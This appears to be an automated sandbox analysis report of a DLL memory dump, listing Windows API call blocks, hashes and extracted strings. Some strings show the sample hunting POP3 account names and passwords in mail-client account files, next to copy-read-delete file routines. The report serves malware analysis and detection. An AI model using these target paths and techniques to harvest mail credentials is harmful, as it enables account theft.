                                                                                                                                                  • Part of subcall function 1000C803: VirtualProtect.KERNEL32(?,00000078,?,?,?,00000000,00000000,1000C7F4,1000C7DD), ref: 1000C82A
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000E.00000002.2910615410.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                • Associated: 0000000E.00000002.2910595697.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                • Associated: 0000000E.00000002.2910615410.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_14_2_10000000_DGlxtFUfY.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: AddressHandleModuleProcProtectVirtual
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 2099061454-0
                                                                                                                                                • Opcode ID: 18a205e926d3f8c1bd8ceb8f3c836a0ea39c7540959748e6d39d93322aab4e9f
                                                                                                                                                • Instruction ID: 210348daefc771ff09e919cc38fdfa0d839c8297c2798a32150270056baeab90
                                                                                                                                                • Opcode Fuzzy Hash: 18a205e926d3f8c1bd8ceb8f3c836a0ea39c7540959748e6d39d93322aab4e9f
                                                                                                                                                • Instruction Fuzzy Hash: 0301D22094574A38BA51D7B40C06EBA5FD8DB176E0B24D756F1408619BDDA08906C3AE

                                                                                                                                                Control-flow Graph

                                                                                                                                                APIs
                                                                                                                                                • GetModuleHandleA.KERNEL32(?,1000C7DD), ref: 1000C838
                                                                                                                                                • GetProcAddress.KERNEL32(00000000,00000000), ref: 1000C860
                                                                                                                                                  • Part of subcall function 1000C7E6: GetModuleHandleA.KERNEL32(1000C7DD), ref: 1000C7E6
                                                                                                                                                  • Part of subcall function 1000C7E6: GetProcAddress.KERNEL32(00000000,1000C7F4), ref: 1000C804
                                                                                                                                                  • Part of subcall function 1000C7E6: VirtualProtect.KERNEL32(?,00000078,00000004,?,00000000,00000000,1000C7F4,1000C7DD), ref: 1000C816
                                                                                                                                                  • Part of subcall function 1000C7E6: VirtualProtect.KERNEL32(?,00000078,?,?,?,00000000,00000000,1000C7F4,1000C7DD), ref: 1000C82A
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000E.00000002.2910615410.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                • Associated: 0000000E.00000002.2910595697.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                • Associated: 0000000E.00000002.2910615410.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_14_2_10000000_DGlxtFUfY.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: AddressHandleModuleProcProtectVirtual
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 2099061454-0
                                                                                                                                                • Opcode ID: 731a18adefd9f684ec9123585341c8004b06a9316977ab842e52f252e525921e
                                                                                                                                                • Instruction ID: abaa11d5974e3e1b05dfd32ec0224f7ddc3d76465740e120717e363e7a178845
                                                                                                                                                • Opcode Fuzzy Hash: 731a18adefd9f684ec9123585341c8004b06a9316977ab842e52f252e525921e
                                                                                                                                                • Instruction Fuzzy Hash: A921382140838A6FF711CBB44C05FA67FD8DB172E0F198696E040CB147DDA89845C3AE

                                                                                                                                                Control-flow Graph

                                                                                                                                                APIs
                                                                                                                                                • GetProcAddress.KERNEL32(00000000,1000C7F4), ref: 1000C804
                                                                                                                                                • VirtualProtect.KERNEL32(?,00000078,00000004,?,00000000,00000000,1000C7F4,1000C7DD), ref: 1000C816
                                                                                                                                                • VirtualProtect.KERNEL32(?,00000078,?,?,?,00000000,00000000,1000C7F4,1000C7DD), ref: 1000C82A
                                                                                                                                                • GetModuleHandleA.KERNEL32(?,1000C7DD), ref: 1000C838
                                                                                                                                                • GetProcAddress.KERNEL32(00000000,00000000), ref: 1000C860
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000E.00000002.2910615410.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                • Associated: 0000000E.00000002.2910595697.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                • Associated: 0000000E.00000002.2910615410.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_14_2_10000000_DGlxtFUfY.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: AddressProcProtectVirtual$HandleModule
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 2152742572-0
                                                                                                                                                • Opcode ID: f81dfe0726a7f77e278230a0c4648d339da411b55a21776b762b5ef698216b3c
                                                                                                                                                • Instruction ID: 9138b94afbcae90e12a8614b592989542e7cb6e8cba5f1d72008c399686a5f74
                                                                                                                                                • Opcode Fuzzy Hash: f81dfe0726a7f77e278230a0c4648d339da411b55a21776b762b5ef698216b3c
                                                                                                                                                • Instruction Fuzzy Hash: B7F0C2619497893CFA21C7B40C45EBA5FCCCB276E0B249A56F600C718BDCA5890693FE

Control-flow Graph
APIs
  • Part of subcall function 10001CCA: CopyFileW.KERNEL32(?,?,00000000,?,?,?,?,?,?,00000000), ref: 10001D1B
  • Part of subcall function 10001CCA: CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000080,00000000,?,?,00000000), ref: 10001D37
  • Part of subcall function 10001CCA: DeleteFileW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 10001D4B
• _strlen.LIBCMT ref: 10001855
• _strlen.LIBCMT ref: 10001869
• _strlen.LIBCMT ref: 1000188B
• _strlen.LIBCMT ref: 100018AE
• _strlen.LIBCMT ref: 100018C8
Strings
Memory Dump Source
• Source File: 0000000E.00000002.2910615410.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
• Associated: 0000000E.00000002.2910595697.0000000010000000.00000004.00001000.00020000.00000000.sdmp
• Associated: 0000000E.00000002.2910615410.0000000010016000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_10000000_DGlxtFUfY.jbxd
Similarity
• API ID: _strlen$File$CopyCreateDelete
• String ID: Acco$Acco$POP3$POP3$Pass$Pass$t$t$un$un$word$word
• API String ID: 3296212668-3023110444
• Opcode ID: 6f2763eb29f99e55b9fa1c4501e1124463a6139b8cfee53aa49ae728a3ea04e1
• Instruction ID: bb93a2ec4ecc4c0c7ac40ef0fbf5621e946fdf476ba73097d2750e43d9e064ca
• Opcode Fuzzy Hash: 6f2763eb29f99e55b9fa1c4501e1124463a6139b8cfee53aa49ae728a3ea04e1
• Instruction Fuzzy Hash: 69612475D04218ABFF11CBE4C851BDEB7F9EF45280F00409AE604A7299EF706A45CF96

Control-flow Graph

APIs
Strings
Memory Dump Source
• Source File: 0000000E.00000002.2910615410.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
• Associated: 0000000E.00000002.2910595697.0000000010000000.00000004.00001000.00020000.00000000.sdmp
• Associated: 0000000E.00000002.2910615410.0000000010016000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_10000000_DGlxtFUfY.jbxd
Similarity
• API ID: _strlen
• String ID: %m$~$Gon~$~F@7$~dra
• API String ID: 4218353326-230879103
• Opcode ID: 5313ffee17f5d615fcbb67a61029f9413697531bcd3fb870ba25ca75e457194f
• Instruction ID: 2a57ee3bda34e0ca62253b4f9cdd28a92c7aa5ebcaa9e167bfd7dd38749d7a78
• Opcode Fuzzy Hash: 5313ffee17f5d615fcbb67a61029f9413697531bcd3fb870ba25ca75e457194f
• Instruction Fuzzy Hash: 9371F5B5D002685BEF11DBB49895BDF7BFCDB05280F104096E644D7246EB74EB85CBA0

Control-flow Graph
APIs
• ___free_lconv_mon.LIBCMT ref: 10007D06
  • Part of subcall function 100090BA: _free.LIBCMT ref: 100090D7
  • Part of subcall function 100090BA: _free.LIBCMT ref: 100090E9
  • Part of subcall function 100090BA: _free.LIBCMT ref: 100090FB
  • Part of subcall function 100090BA: _free.LIBCMT ref: 1000910D
  • Part of subcall function 100090BA: _free.LIBCMT ref: 1000911F
  • Part of subcall function 100090BA: _free.LIBCMT ref: 10009131
  • Part of subcall function 100090BA: _free.LIBCMT ref: 10009143
  • Part of subcall function 100090BA: _free.LIBCMT ref: 10009155
  • Part of subcall function 100090BA: _free.LIBCMT ref: 10009167
  • Part of subcall function 100090BA: _free.LIBCMT ref: 10009179
  • Part of subcall function 100090BA: _free.LIBCMT ref: 1000918B
  • Part of subcall function 100090BA: _free.LIBCMT ref: 1000919D
  • Part of subcall function 100090BA: _free.LIBCMT ref: 100091AF
• _free.LIBCMT ref: 10007CFB
  • Part of subcall function 1000571E: HeapFree.KERNEL32(00000000,00000000,?,1000924F,?,00000000,?,00000000,?,10009276,?,00000007,?,?,10007E5A,?), ref: 10005734
  • Part of subcall function 1000571E: GetLastError.KERNEL32(?,?,1000924F,?,00000000,?,00000000,?,10009276,?,00000007,?,?,10007E5A,?,?), ref: 10005746
• _free.LIBCMT ref: 10007D1D
• _free.LIBCMT ref: 10007D32
• _free.LIBCMT ref: 10007D3D
• _free.LIBCMT ref: 10007D5F
• _free.LIBCMT ref: 10007D72
• _free.LIBCMT ref: 10007D80
• _free.LIBCMT ref: 10007D8B
• _free.LIBCMT ref: 10007DC3
• _free.LIBCMT ref: 10007DCA
• _free.LIBCMT ref: 10007DE7
• _free.LIBCMT ref: 10007DFF
Memory Dump Source
• Source File: 0000000E.00000002.2910615410.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
• Associated: 0000000E.00000002.2910595697.0000000010000000.00000004.00001000.00020000.00000000.sdmp
• Associated: 0000000E.00000002.2910615410.0000000010016000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_10000000_DGlxtFUfY.jbxd
Similarity
• API ID: _free$ErrorFreeHeapLast___free_lconv_mon
• String ID:
• API String ID: 161543041-0
• Opcode ID: 04f87de51616aa77c632626b63215b7c3e2981daeb02be256c48a4a07a0be686
• Instruction ID: 6de9b84f5b51ee4e35cbeb1ed48e08772f21b212059d2ac72beb9c863e9ed859
• Opcode Fuzzy Hash: 04f87de51616aa77c632626b63215b7c3e2981daeb02be256c48a4a07a0be686
• Instruction Fuzzy Hash: 90313931A04645EFFB21DA38E941B6A77FAFF002D1F11446AE84DDB159DE3ABC809B14

Control-flow Graph

APIs
• _free.LIBCMT ref: 100059EA
  • Part of subcall function 1000571E: HeapFree.KERNEL32(00000000,00000000,?,1000924F,?,00000000,?,00000000,?,10009276,?,00000007,?,?,10007E5A,?), ref: 10005734
  • Part of subcall function 1000571E: GetLastError.KERNEL32(?,?,1000924F,?,00000000,?,00000000,?,10009276,?,00000007,?,?,10007E5A,?,?), ref: 10005746
• _free.LIBCMT ref: 100059F6
• _free.LIBCMT ref: 10005A01
• _free.LIBCMT ref: 10005A0C
• _free.LIBCMT ref: 10005A17
• _free.LIBCMT ref: 10005A22
• _free.LIBCMT ref: 10005A2D
• _free.LIBCMT ref: 10005A38
• _free.LIBCMT ref: 10005A43
• _free.LIBCMT ref: 10005A51
Memory Dump Source
• Source File: 0000000E.00000002.2910615410.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
• Associated: 0000000E.00000002.2910595697.0000000010000000.00000004.00001000.00020000.00000000.sdmp
• Associated: 0000000E.00000002.2910615410.0000000010016000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_10000000_DGlxtFUfY.jbxd
Similarity
• API ID: _free$ErrorFreeHeapLast
• String ID:
• API String ID: 776569668-0
• Opcode ID: c98d8f3bae8e62c9802464aaca1a5f37d2e9bc397092d84fe88d11ffaa9aaf75
• Instruction ID: 60753d52f1e9cb5801f9add085180c5dd3fc305f79823ad6bc57240ee419c635
• Opcode Fuzzy Hash: c98d8f3bae8e62c9802464aaca1a5f37d2e9bc397092d84fe88d11ffaa9aaf75
• Instruction Fuzzy Hash: BE11B97E514548FFEB11DF58D842CDE3FA9EF04291B4540A1BD088F12ADA32EE50AB84

Control-flow Graph

APIs
• CopyFileW.KERNEL32(?,?,00000000,?,?,?,?,?,?,00000000), ref: 10001D1B
• CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000080,00000000,?,?,00000000), ref: 10001D37
• DeleteFileW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 10001D4B
• GetFileSize.KERNEL32(00000000,00000000,?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 10001D58
• ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,?,00000000,?,?,?,?,?,?,00000000), ref: 10001D72
• CloseHandle.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,00000000), ref: 10001D7D
• DeleteFileW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 10001D8A
Memory Dump Source
• Source File: 0000000E.00000002.2910615410.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
• Associated: 0000000E.00000002.2910595697.0000000010000000.00000004.00001000.00020000.00000000.sdmp
• Associated: 0000000E.00000002.2910615410.0000000010016000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_10000000_DGlxtFUfY.jbxd
Similarity
• API ID: File$Delete$CloseCopyCreateHandleReadSize
• String ID:
• API String ID: 1454806937-0
• Opcode ID: 95ffba8e0906de61fbf41533eef9bce15325b0b0370a179d90a4a5ca68fedbfa
• Instruction ID: 3114db45d92e83daf92c47a85baf70c14dd0292bf94a6379629bf72341f68b19
• Opcode Fuzzy Hash: 95ffba8e0906de61fbf41533eef9bce15325b0b0370a179d90a4a5ca68fedbfa
• Instruction Fuzzy Hash: 2221FCB594122CAFF710EBA08CCCFEF76ACEB08395F010566F515D2154D6709E458A70

                                                                                                                                                 Control-flow Graph (rendered graph omitted): entry block 10009492; blocks call GetConsoleCP, WideCharToMultiByte, WriteFile (two call sites) and GetLastError, plus internal subroutines 10002ada, 10007c19 and 100079e6
                                                                                                                                                APIs
                                                                                                                                                • GetConsoleCP.KERNEL32 ref: 100094D4
                                                                                                                                                • __fassign.LIBCMT ref: 1000954F
                                                                                                                                                • __fassign.LIBCMT ref: 1000956A
                                                                                                                                                • WideCharToMultiByte.KERNEL32(?,00000000,?,00000001,?,00000005,00000000,00000000), ref: 10009590
                                                                                                                                                • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 100095AF
                                                                                                                                                • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 100095E8
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000E.00000002.2910615410.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                 • Associated: 0000000E.00000002.2910595697.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                 • Associated: 0000000E.00000002.2910615410.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_14_2_10000000_DGlxtFUfY.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 1324828854-0
                                                                                                                                                • Opcode ID: c8cde1f94c5a3c187481f919a86e285046f284bf183baf255f965bcae4dd5098
                                                                                                                                                • Instruction ID: 7b1e32e7ca62d622bc6abd4954a79b3a1191cf35157f5551c2bc05612337e78d
                                                                                                                                                • Opcode Fuzzy Hash: c8cde1f94c5a3c187481f919a86e285046f284bf183baf255f965bcae4dd5098
                                                                                                                                                • Instruction Fuzzy Hash: D7519271D00249AFEB10CFA4CC95BDEBBF8EF09350F15811AE955E7295D731AA41CB60

                                                                                                                                                 Control-flow Graph (rendered graph omitted): entry block 10003370; blocks call internal subroutines 10003330, 100037a7, 10003790, 10003740, 10003774, 10003758 and 1000bbe0
                                                                                                                                                APIs
                                                                                                                                                • _ValidateLocalCookies.LIBCMT ref: 1000339B
                                                                                                                                                • ___except_validate_context_record.LIBVCRUNTIME ref: 100033A3
                                                                                                                                                • _ValidateLocalCookies.LIBCMT ref: 10003431
                                                                                                                                                • __IsNonwritableInCurrentImage.LIBCMT ref: 1000345C
                                                                                                                                                • _ValidateLocalCookies.LIBCMT ref: 100034B1
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000E.00000002.2910615410.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                 • Associated: 0000000E.00000002.2910595697.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                 • Associated: 0000000E.00000002.2910615410.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_14_2_10000000_DGlxtFUfY.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                                                                                                • String ID: csm
                                                                                                                                                • API String ID: 1170836740-1018135373
                                                                                                                                                • Opcode ID: 314e045d64bd9dff90e147ebc0021a06731dbc25050b3dab86f6a1545ce1a07e
                                                                                                                                                • Instruction ID: 0a936c430148d26a69835db3fa9f683d01d5328c1142e13f0191aacd949c771e
                                                                                                                                                • Opcode Fuzzy Hash: 314e045d64bd9dff90e147ebc0021a06731dbc25050b3dab86f6a1545ce1a07e
                                                                                                                                                • Instruction Fuzzy Hash: D141D678E042189BEB12CF68C880A9FBBF9EF453A4F10C155E9159F25AD731FA01CB91

                                                                                                                                                Control-flow Graph

                                                                                                                                                APIs
                                                                                                                                                  • Part of subcall function 10009221: _free.LIBCMT ref: 1000924A
                                                                                                                                                • _free.LIBCMT ref: 100092AB
                                                                                                                                                  • Part of subcall function 1000571E: HeapFree.KERNEL32(00000000,00000000,?,1000924F,?,00000000,?,00000000,?,10009276,?,00000007,?,?,10007E5A,?), ref: 10005734
                                                                                                                                                  • Part of subcall function 1000571E: GetLastError.KERNEL32(?,?,1000924F,?,00000000,?,00000000,?,10009276,?,00000007,?,?,10007E5A,?,?), ref: 10005746
                                                                                                                                                • _free.LIBCMT ref: 100092B6
                                                                                                                                                • _free.LIBCMT ref: 100092C1
                                                                                                                                                • _free.LIBCMT ref: 10009315
                                                                                                                                                • _free.LIBCMT ref: 10009320
                                                                                                                                                • _free.LIBCMT ref: 1000932B
                                                                                                                                                • _free.LIBCMT ref: 10009336
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000E.00000002.2910615410.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                 • Associated: 0000000E.00000002.2910595697.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                 • Associated: 0000000E.00000002.2910615410.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_14_2_10000000_DGlxtFUfY.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 776569668-0
                                                                                                                                                • Opcode ID: 1a15e4038a9c55df62fbd1c49a93c652c8e4a7ee207dd1f8de08331087c78b01
                                                                                                                                                • Instruction ID: 62dea9ede071ec04ae7e8d39c2d2a9b8d59ba4565e42afa4a1a73bd13a3591d1
                                                                                                                                                • Opcode Fuzzy Hash: 1a15e4038a9c55df62fbd1c49a93c652c8e4a7ee207dd1f8de08331087c78b01
                                                                                                                                                • Instruction Fuzzy Hash: 3E118E35548B08FAFA20EBB0EC47FCB7B9DEF04780F400824BA9DB6097DA25B5249751

                                                                                                                                                 Control-flow Graph (rendered graph omitted): entry block 10008821; blocks call MultiByteToWideChar (two call sites) and WideCharToMultiByte, plus internal subroutines 10009341, 10002ada, 100056d0, 1000bf20, 10005f19 and 10008801
                                                                                                                                                APIs
                                                                                                                                                • MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,00000100,10006FFD,00000000,?,?,?,10008A72,?,?,00000100), ref: 1000887B
                                                                                                                                                • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?,?,?,?,10008A72,?,?,00000100,5EFC4D8B,?,?), ref: 10008901
                                                                                                                                                • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,5EFC4D8B,00000100,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 100089FB
                                                                                                                                                • __freea.LIBCMT ref: 10008A08
                                                                                                                                                  • Part of subcall function 100056D0: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 10005702
                                                                                                                                                • __freea.LIBCMT ref: 10008A11
                                                                                                                                                • __freea.LIBCMT ref: 10008A36
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000E.00000002.2910615410.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                 • Associated: 0000000E.00000002.2910595697.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                 • Associated: 0000000E.00000002.2910615410.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_14_2_10000000_DGlxtFUfY.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: ByteCharMultiWide__freea$AllocateHeap
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 1414292761-0
                                                                                                                                                • Opcode ID: bbd44e65680a142b819532ff26adde273e0ccd3bd0c95f1520c1a5c0857fc469
                                                                                                                                                • Instruction ID: 3f57ce737592ef9202bcebfaa3f65c0582e3f3231b4dd00ae19a895c9b397c34
                                                                                                                                                • Opcode Fuzzy Hash: bbd44e65680a142b819532ff26adde273e0ccd3bd0c95f1520c1a5c0857fc469
                                                                                                                                                • Instruction Fuzzy Hash: 4F51CF72710216ABFB15CF60CC85EAB37A9FB417D0F11462AFC44D6148EB35EE509BA1
                                                                                                                                                APIs
                                                                                                                                                • _strlen.LIBCMT ref: 10001607
                                                                                                                                                • _strcat.LIBCMT ref: 1000161D
                                                                                                                                                • lstrlenW.KERNEL32(?,00000000,00000000,00000000,?,?,?,?,1000190E,?,?,00000000,?,00000000), ref: 10001643
                                                                                                                                                • lstrcatW.KERNEL32(?,?,?,?,?,?,1000190E,?,?,00000000,?,00000000,?,?,?,00000104), ref: 1000165A
                                                                                                                                                • lstrlenW.KERNEL32(?,?,?,?,?,1000190E,?,?,00000000,?,00000000,?,?,?,00000104,?), ref: 10001661
                                                                                                                                                • lstrcatW.KERNEL32(00001008,?,?,?,?,?,1000190E,?,?,00000000,?,00000000,?,?,?,00000104), ref: 10001686
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000E.00000002.2910615410.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                 • Associated: 0000000E.00000002.2910595697.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                 • Associated: 0000000E.00000002.2910615410.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_14_2_10000000_DGlxtFUfY.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: lstrcatlstrlen$_strcat_strlen
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 1922816806-0
                                                                                                                                                • Opcode ID: 315c55c979a72bdf3ac51594b752bef976f460307e9923370b73d2b1bd80b905
                                                                                                                                                • Instruction ID: a267a6945d1554df97f4c8e17fbec8689bbb0548aac84132402ab8fad08d9bbc
                                                                                                                                                • Opcode Fuzzy Hash: 315c55c979a72bdf3ac51594b752bef976f460307e9923370b73d2b1bd80b905
                                                                                                                                                • Instruction Fuzzy Hash: 9821A776900204ABEB05DBA4DC85FEE77B8EF88750F24401BF604AB185DF34B94587A9
                                                                                                                                                APIs
                                                                                                                                                • lstrcatW.KERNEL32(?,?,?,?,?,00000000), ref: 10001038
                                                                                                                                                • lstrlenW.KERNEL32(?,?,?,?,00000000), ref: 1000104B
                                                                                                                                                • lstrlenW.KERNEL32(?,?,?,?,00000000), ref: 10001061
                                                                                                                                                • lstrlenW.KERNEL32(?,?,?,?,?,00000000), ref: 10001075
                                                                                                                                                • GetFileAttributesW.KERNEL32(?,?,?,00000000), ref: 10001090
                                                                                                                                                • lstrlenW.KERNEL32(?,?,?,00000000), ref: 100010B8
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000E.00000002.2910615410.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                 • Associated: 0000000E.00000002.2910595697.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                 • Associated: 0000000E.00000002.2910615410.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_14_2_10000000_DGlxtFUfY.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: lstrlen$AttributesFilelstrcat
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 3594823470-0
APIs
• GetLastError.KERNEL32(?,?,10003518,100023F1,10001F17), ref: 10003864
• ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 10003872
• ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 1000388B
• SetLastError.KERNEL32(00000000,?,10003518,100023F1,10001F17), ref: 100038DD
Memory Dump Source
• Source File: 0000000E.00000002.2910615410.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
• Associated: 0000000E.00000002.2910595697.0000000010000000.00000004.00001000.00020000.00000000.sdmp
• Associated: 0000000E.00000002.2910615410.0000000010016000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_10000000_DGlxtFUfY.jbxd
Similarity
• API ID: ErrorLastValue___vcrt_
• String ID:
• API String ID: 3852720340-0
APIs
• GetLastError.KERNEL32(?,?,10006C6C), ref: 10005AFA
• _free.LIBCMT ref: 10005B2D
• _free.LIBCMT ref: 10005B55
• SetLastError.KERNEL32(00000000,?,?,10006C6C), ref: 10005B62
• SetLastError.KERNEL32(00000000,?,?,10006C6C), ref: 10005B6E
• _abort.LIBCMT ref: 10005B74
Memory Dump Source
• Source File: 0000000E.00000002.2910615410.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
• Associated: 0000000E.00000002.2910595697.0000000010000000.00000004.00001000.00020000.00000000.sdmp
• Associated: 0000000E.00000002.2910615410.0000000010016000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_10000000_DGlxtFUfY.jbxd
Similarity
• API ID: ErrorLast$_free$_abort
• String ID:
• API String ID: 3160817290-0
APIs
  • Part of subcall function 10001E89: lstrlenW.KERNEL32(?,?,?,?,?,100010DF,?,?,?,00000000), ref: 10001E9A
  • Part of subcall function 10001E89: lstrcatW.KERNEL32(?,?,?,100010DF,?,?,?,00000000), ref: 10001EAC
  • Part of subcall function 10001E89: lstrlenW.KERNEL32(?,?,100010DF,?,?,?,00000000), ref: 10001EB3
  • Part of subcall function 10001E89: lstrlenW.KERNEL32(?,?,100010DF,?,?,?,00000000), ref: 10001EC8
  • Part of subcall function 10001E89: lstrcatW.KERNEL32(?,100010DF,?,100010DF,?,?,?,00000000), ref: 10001ED3
• GetFileAttributesW.KERNEL32(?,?,?,?), ref: 1000122A
  • Part of subcall function 1000173A: _strlen.LIBCMT ref: 10001855
  • Part of subcall function 1000173A: _strlen.LIBCMT ref: 10001869
Memory Dump Source
• Source File: 0000000E.00000002.2910615410.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
• Associated: 0000000E.00000002.2910595697.0000000010000000.00000004.00001000.00020000.00000000.sdmp
• Associated: 0000000E.00000002.2910615410.0000000010016000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_10000000_DGlxtFUfY.jbxd
Similarity
• API ID: lstrlen$_strlenlstrcat$AttributesFile
• String ID: \Accounts\Account.rec0$\Data\AccCfg\Accounts.tdat$\Mail\$\Storage\
• API String ID: 4036392271-1520055953
APIs
• GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,10004AEA,?,?,10004A8A,?,10012238,0000000C,10004BBD,00000000,00000000), ref: 10004B59
• GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 10004B6C
• FreeLibrary.KERNEL32(00000000,?,?,?,10004AEA,?,?,10004A8A,?,10012238,0000000C,10004BBD,00000000,00000000,00000001,10002082), ref: 10004B8F
Memory Dump Source
• Source File: 0000000E.00000002.2910615410.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
• Associated: 0000000E.00000002.2910595697.0000000010000000.00000004.00001000.00020000.00000000.sdmp
• Associated: 0000000E.00000002.2910615410.0000000010016000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
